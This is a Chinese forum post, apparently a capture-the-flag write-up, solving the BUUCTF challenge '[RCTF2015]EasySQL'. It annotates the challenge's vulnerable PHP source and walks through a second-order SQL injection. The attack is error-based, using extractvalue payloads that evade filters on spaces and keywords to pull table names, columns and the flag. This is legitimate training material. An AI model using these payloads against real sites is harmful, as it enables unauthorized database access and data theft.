60,【1】BUUCF web [RCTF2015]EasySQL1

打印 上一主题 下一主题

主题 1598|帖子 1598|积分 4794


先查看源码


1,changepwd(修改密码)


  1. <?php
  2. // 开启会话,以便使用会话变量
  3. session_start();
  4. // 设置页面的内容类型为 HTML 并使用 UTF-8 编码
  5. header("Content-Type: text/html; charset=UTF-8");
  6. // 引入配置文件,通常包含数据库连接信息等
  7. require_once 'config.php';
  8. // 输出一个表单,用于用户输入旧密码和新密码
  9. echo '<form action="" method="post"><p>oldpass: <input type="text" name="oldpass" /></p><p>newpass: <input type="text" name="newpass" /></p><input type="submit" value="Submit" /></form>';
  10. // 检查是否提交了旧密码和新密码
  11. if (isset($_POST['oldpass']) && isset($_POST['newpass'])) {
  12.     // 将用户输入的旧密码进行 MD5 哈希处理
  13.     $oldpass = md5($_POST['oldpass']);
  14.     // 将用户输入的新密码进行 MD5 哈希处理
  15.     $newpass = md5($_POST['newpass']);
  16.     // 获取当前登录用户的用户名,存储在会话中
  17.     $username = $_SESSION['username'];
  18.     // 构建 SQL 语句,用于更新用户的密码,使用用户输入的旧密码验证用户身份
  19.     $sql = "update users set pwd='$newpass' where name="$username" and pwd='$oldpass'";
  20.     // var_dump($sql);
  21.     // 执行 SQL 查询
  22.     $query = mysql_query($sql);
  23.     // 检查查询是否成功执行
  24.     if ($query) {
  25.         // 如果查询成功,退出脚本,可根据需要修改为更有意义的操作,如显示成功消息
  26.         exit('');
  27.     } else {
  28.         // 如果查询失败,输出 MySQL 错误信息并终止脚本
  29.         die(mysql_error());
  30.     }
  31. }
  32. ?>
复制代码
此文件表明会对输入的用户名和密码举行MD5哈希处理

以是数据库中存储的是MD5哈希值

查询成功,此文件执行结束,如果失败,会输出MySQL错误信息

似乎是报错注入


2,config(配置文件)


  1. <?php
  2. // 定义数据库主机地址和端口号
  3. $dbhost = 'localhost:3306';
  4. // 定义数据库用户名
  5. $dbuser = 'root';
  6. // 定义数据库密码,这里是空密码
  7. $dbpass = '';
  8. // 使用 mysql_connect 函数尝试连接到数据库服务器,传递主机、用户名和密码作为参数
  9. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  10. // 选择要使用的数据库,这里选择的是名为 'web_sqli' 的数据库
  11. mysql_select_db('web_sqli');
  12. // 设置字符集为 utf8,确保数据库操作使用 utf8 编码,避免乱码问题
  13. mysql_query('set NAMES utf8');
  14. // 检查是否开启了魔术引号,如果没有开启,则对 POST 和 GET 数据进行转义处理
  15. if (!get_magic_quotes_gpc()) {
  16.     // 遍历 POST 数据,对其中的每个元素进行转义处理
  17.     foreach ($_POST as $key => $value) {
  18.         // 使用 addslashes 函数对值进行转义,防止 SQL 注入
  19.         $_POST[$key] = addslashes($value);
  20.     }
  21.     // 遍历 GET 数据,对其中的每个元素进行转义处理
  22.     foreach ($_GET as $key => $value) {
  23.         // 使用 addslashes 函数对值进行转义,防止 SQL 注入
  24.         $_GET[$key] = addslashes($value);
  25.     }
  26. }
  27. ?>
复制代码
此文件表明数据库用户名为root,密码是空密码

而且检查是否开启了魔术引号,未开启时对post,get数据举行转义处理


3,index(默认首页文件)


  1. <?php
  2. // 开始一个新的会话或继续已有的会话
  3. session_start();
  4. // 设置 HTTP 响应头,指定内容类型为 text/html 且字符编码为 UTF-8
  5. header("Content-Type: text/html; charset=UTF-8");
  6. // 引入配置文件,通常包含数据库连接信息等
  7. require_once 'config.php';
  8. // 检查是否已经设置了会话中的用户名,这通常表示用户已经登录
  9. if (isset($_SESSION['username'])) {
  10.     // 输出欢迎信息,并显示用户的名字作为一个链接,指向 user.php 页面
  11.     echo "Hi,<a href='user.php'>".$_SESSION['username']."</a>";
  12.     // 输出一个无序列表的开始标签
  13.     echo "<ul>";
  14.     // 输出列表项,链接到 index.php 并传递不同的 title 参数
  15.     echo "<li><a href='index.php?title=lcsg'>良辰诗歌</a></li>";
  16.     echo "<li><a href='index.php?title=wyzb'>网友装逼</a></li>";
  17.     echo "<li><a href='index.php?title=zrtbf'>赵日天不服</a></li>";
  18.     // 输出无序列表的结束标签
  19.     echo "</ul>";
  20.     // 检查是否从 GET 请求中接收到了 title 参数
  21.     if (isset($_GET['title'])) {
  22.         // 获取 GET 请求中的 title 参数的值
  23.         $title = $_GET['title'];
  24.         // 构建一个 SQL 查询语句,根据 title 从 article 表中查询数据
  25.         $sql = "select * from article where title='$title'";
  26.         // 执行 SQL 查询
  27.         $query = mysql_query($sql);
  28.         // 检查查询是否成功执行
  29.         if ($query) {
  30.             // 获取查询结果的一行数据作为关联数组
  31.             $row = mysql_fetch_array($query);
  32.             // 输出查询结果中 content 列的数据
  33.             echo $row['content'];
  34.         }
  35.     }
  36. } else {
  37.     // 如果用户没有登录,输出匿名用户的欢迎信息
  38.     echo "Hi,Anonymous<br>";
  39.     // 输出登录页面的链接
  40.     echo "<a href='./login.php'>LOGIN</a><br>";
  41.     // 输出注册页面的链接
  42.     echo "<a href='./register.php'>REGISTER</a><br>";
  43. }
  44. ?>
复制代码



4,login(登录)


  1. <?php
  2. // 开始一个新的会话或继续已有的会话
  3. session_start();
  4. // 设置 HTTP 响应头,指定内容类型为 text/html 并使用 UTF-8 编码
  5. header("Content-Type: text/html; charset=UTF-8");
  6. // 引入配置文件,通常包含数据库连接信息等
  7. require_once 'config.php';
  8. // 输出一个 HTML 表单,用户可以在其中输入用户名和密码,表单提交到 login.php 页面,使用 POST 方法
  9. echo '<form action="login.php" method="post"><p>username: <input type="text" name="username" /></p><p>password: <input type="text" name="password" /></p><input type="submit" value="Submit" /></form>';
  10. // 检查是否通过 POST 方法提交了用户名和密码
  11. if (isset($_POST['username']) && isset($_POST['password'])) {
  12.     // 获取用户输入的用户名
  13.     $username = $_POST['username'];
  14.     // 使用 MD5 对用户输入的密码进行哈希处理(这种方式已不安全,建议使用 password_hash 函数)
  15.     $password = md5($_POST['password']);
  16.     // 构建 SQL 查询语句,用于从 users 表中查找匹配的用户名和密码
  17.     $sql = "SELECT * FROM users WHERE name = '$username' and pwd = '$password'";
  18.     // 执行 SQL 查询
  19.     $query = mysql_query($sql);
  20.     // 检查查询结果是否正好有一行(即找到一个匹配的用户)
  21.     if (mysql_num_rows($query) == 1) {
  22.         // 获取查询结果的一行数据
  23.         $row = mysql_fetch_array($query);
  24.         // 将用户名存储在会话中,用于后续页面判断用户是否已登录
  25.         $_SESSION['username'] = $row['name'];
  26.         // 重定向到 index.php 页面
  27.         header('Location: index.php');
  28.         // 终止脚本执行
  29.         die();
  30.     } else {
  31.         // 如果未找到匹配用户,输出登录错误信息并终止脚本
  32.         die('<br>login error');
  33.     }
  34. }
  35. ?>
复制代码
看完这个源码后就看不到了

只能先辈靶场了


进入靶场

实验输入



无效字符串

不管输啥都说无效字符串,,,,,,

后来发现似乎是Email出了问题



知道了一个用户名(猜测可以通过新注册一个账号来更改admin账户的密码)
以此来注册一个账号

登录

看到此页面


点击admin#后发现可以更改密码
那就先把admin账号的密码改了


改成123

登录看看


好打脸啊
一开始输admin'说无效字符串后就没输过'了
补上再输一遍
照旧错的????????????????????
试试  "

好吧,也是对了,以后菜就多试

先都点进去看看




so,我是什么很贱的人吗,给我看这个


不外通过以上操纵,得知存在二次注入
根据源码知道它会报错
而且一开始的操纵知道它会过滤
50.【8】BUUCTF WEB HardSql-CSDN博客
参考这篇博客的语句

1,查询库名


admin"^extractvalue(1,concat(0x7e,(select(database()))))#
(#是以get方式提交时使用的,-- -和-- +是以post方式提交时使用的,%23在url处使用)

2,查询表名


admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('~web_sqli'))))#



???
实验了一下,是把like过滤了


admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#

空缺???



admin"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#


照旧空缺?????????



admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))#

把库名带进去就报不出来,那我求库名的操纵算什么????

算我。。


3,查询字段名

admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag')))#

4,查询字段内容


admin"^extractvalue(1,concat(0x7e,(select(flag)from(flag))))#




admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))#
 

语义未尽



用right让背面的爆出来


admin"^extractvalue(1,right(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),32))#


要不我照旧去四八(好不轻易把括号一组一组对上)
他把right过滤了


admin"^extractvalue(1,concat(0x7e,reverse((select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'))))#

终于终于

admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users))))#


???还好还好,快结束了
下午学姐刚好讲了正则表达式
admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f'))))#

admin"^extractvalue(1,concat(0x7e,reverse((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')))))#


手动拼一下
flag{090f0996-0d57-4a30-b0d9-92675185411f}

over


笔记

1,该用字典还得用字典
2,extractvalue
3,空格被过滤的题目第一遍就认真留意()的个数,千万别再多一个少一个了


 



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

用户云卷云舒

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表